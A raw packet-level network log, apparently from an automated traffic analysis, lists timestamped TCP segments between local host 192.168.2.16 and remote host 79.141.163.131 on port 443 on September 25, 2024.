                                                                              Sep 25, 2024 19:02:13.966412067 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.966458082 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.966468096 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.966501951 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.967499971 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.968219995 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.968261957 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.968307018 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.968317986 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.968364000 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.968453884 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.970855951 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.970911980 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.970956087 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.970967054 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:13.970997095 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:13.971141100 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.043281078 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.043320894 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.043426037 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.043454885 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.043488026 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.043849945 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.046282053 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.046314001 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.046391010 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.046391010 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.046417952 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.046621084 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.049156904 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.049177885 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.049259901 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.049259901 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.049274921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.049443960 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.051492929 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.051539898 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.051640034 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.051640034 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.051654100 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052009106 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052051067 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052098036 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.052109957 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052139044 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.052664042 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.052680969 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052714109 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052755117 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.052771091 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.052795887 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.052850962 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.054390907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.054430962 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.054518938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.054518938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.054532051 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.056679964 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.057297945 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.057332039 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.057429075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.057429075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.057441950 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.057506084 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.129740953 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.129786015 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.129834890 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.129854918 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.129894018 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.130182981 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.132558107 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.132601976 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.132649899 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.132661104 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.132702112 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.133524895 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.135515928 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.135559082 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.135602951 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.135613918 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.135648966 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.135806084 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.138809919 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.138850927 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.138931036 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.138931990 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.138945103 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139183998 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139230967 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139236927 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139262915 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139278889 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139332056 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139332056 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139620066 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139662027 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139708996 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139719963 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.139758110 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.139884949 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.140707970 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.140748024 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.140794039 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.140804052 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.140841007 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.140937090 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.143754959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.143799067 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.143872976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.143872976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.143887043 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.144040108 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.216272116 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.216305017 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.216357946 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.216393948 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.216413021 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.216445923 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.218859911 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.218879938 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.218928099 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.218935966 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.218957901 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.219014883 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.221740007 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.221762896 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.221828938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.221843004 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.221918106 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.224595070 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.224615097 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.224674940 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.224694967 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.224721909 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.224766970 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225008011 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225028038 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225073099 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225084066 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225114107 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225143909 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225586891 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225606918 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225667953 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.225678921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.225733995 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.227005959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.227026939 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.227083921 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.227094889 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.227123976 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.227144003 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.229870081 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.229898930 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.229954004 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.229964972 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.230000019 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.230000019 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.310720921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.310766935 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.310812950 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.310837030 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.310873032 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.310894012 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.311948061 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.311992884 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312030077 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312041044 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312066078 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312086105 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312386990 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312427998 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312458038 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312469959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312498093 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312498093 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312521935 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.312953949 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.312995911 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313035965 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313046932 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313072920 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313090086 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313319921 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313363075 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313395023 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313405037 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313431978 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313476086 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313828945 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313869953 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313905001 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313915968 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.313955069 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.313977957 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.315319061 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.315361977 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.315440893 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.315440893 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.315455914 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.315511942 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.317006111 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.317047119 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.317075968 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.317086935 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.317112923 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.317138910 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.397098064 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.397157907 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.397200108 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.397233009 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.397267103 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.397289038 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.398576021 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.398631096 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.398787975 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.398787975 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.398855925 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.398921013 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.399606943 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.399652004 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.399686098 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.399708986 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.399735928 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.399755001 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400152922 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400194883 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400238037 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400254011 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400283098 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400302887 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400794983 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400815010 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400876999 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.400883913 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.400933027 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.401422977 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.401443005 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.401484013 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.401495934 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.401513100 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.401532888 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.402486086 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.402506113 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.402548075 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.402553082 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.402587891 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.402601004 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.407561064 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.407596111 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.407641888 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.407646894 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.407706022 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.407706022 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.484436035 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.484481096 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.484519958 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.484534979 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.484590054 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.484927893 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.484976053 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.485021114 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.485033035 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.485059977 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.485076904 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.486140966 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.486197948 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.486227989 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.486238003 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.486269951 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.486289024 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487062931 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487107992 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487159014 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487169027 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487195015 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487217903 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487488985 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487530947 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487565041 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487576008 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487601042 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487623930 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487799883 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487839937 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487879992 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487890959 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.487916946 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.487956047 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.489490986 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.489535093 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.489578009 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.489588976 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.489614964 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.489636898 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.492053032 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.492095947 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.492137909 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.492150068 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.492197037 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.492217064 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.571026087 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.571079969 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.571129084 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.571167946 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.571207047 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.571229935 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.572086096 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.572129011 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.572160959 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.572175026 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.572205067 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.572225094 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.572804928 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.572849035 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.572877884 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.572890997 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.572917938 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.572937965 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.573491096 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.573530912 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.573564053 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.573575974 CEST4434970479.141.163.131192.168.2.16
                                                                              Sep 25, 2024 19:02:14.573606014 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.573625088 CEST49704443192.168.2.1679.141.163.131
                                                                              Sep 25, 2024 19:02:14.574532032 CEST4434970479.141.163.131192.168.2.16
